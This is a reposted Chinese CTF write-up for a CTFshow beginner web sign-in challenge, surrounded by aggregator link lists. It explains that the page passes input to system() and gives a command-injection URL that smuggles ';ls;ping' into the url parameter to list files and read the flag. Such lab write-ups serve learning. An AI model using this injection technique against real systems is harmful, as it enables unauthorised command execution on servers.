CTFshow萌新赛-web签到

其他 2020-03-08 11:00:54 阅读次数: 0

打开靶机

查看页面信息

可以看到有一个system函数

在Linux中可以使用“；”隔离不同的语句

payload如下

https://5105c8b6-83aa-4993-91bf-296eb5983ef2.chall.ctf.show/?url=5105c8b6-83aa-4993-91bf-296eb5983ef2.chall.ctf.show;ls;ping www

使用同样的方法查看flag文件内容

payload

成功拿到flag

猜你喜欢

转载自www.cnblogs.com/anweilx/p/12436116.html

CTFshow萌新赛-web签到

CTFshow-萌新赛杂项_签到

CTFshow萌新赛-密码学签到

CTFshow-萌新赛web_假赛生

CTFshow萌新赛-萌新福利

CTFshow-萌新赛逆向_签退

CTFshow萌新计划-Web（二）

CTFshow萌新计划-Web（三）

CTFShow：萌新web1

CTFShow：萌新Web2

CTFshow-萌新赛杂项_劝退警告

web萌新赛记录

CTFSHOW萌新计划 web16-17

CTFSHOW 萌新计划web9-15

CTFSHOW 萌新计划 web 1-8

ctfshow—web—web签到题

CTFSHOW【萌新计划】Writeup

CTF show 萌新赛web

速刷ctfshow萌新计划 web+misc（23届不用谢我）

ctfshow萌新红包题writeup

CTFSHOW WEB_AK赛

新春赛萌新记录

【CTFshow】——PWN签到题

CTF之萌新web学习1

CTF之萌新web学习2

【Web】CTFSHOW元旦水友赛部分wp

??萌新

面向萌新的红帽杯2018线上赛wp

50 萌新水题赛 D题题意

[CTFSHOW]WEBAK赛

今日推荐

《美国对全球网络空间安全与发展的威胁和破坏》报告发布

火速冲上 GitHub 热榜 —— 开源编程语言、框架哪有这么可爱？

北京人形机器人创新中心发布全球首个纯电驱拟人奔跑的全尺寸人形机器人“天工”

LFOSSA 源来如此公开课 | 掌握云原生未来：CNCF 认证全面攻略与备考秘籍

周排行

让自己的头脑极度开放

CentOS 6.5(x64) 和Redhat6.5操作系误删libc

高可用注册中心

【日记】12.28/【题解】AtCoder AGC041

XML（5）_XML 约束_DTD

Java集合Map（四）

树梅派安装桌面环境教程

pipenv 的使用和安装

小程序白屏问题和内存研究

C语言简单选择排序

每日归档

2024-05-02(0)

2024-05-01(4)

2024-04-30(1)

2024-04-29(40)

2024-04-28(0)

2024-04-27(56)

2024-04-26(39)

2024-04-25(22)

2024-04-24(36)

2024-04-23(26)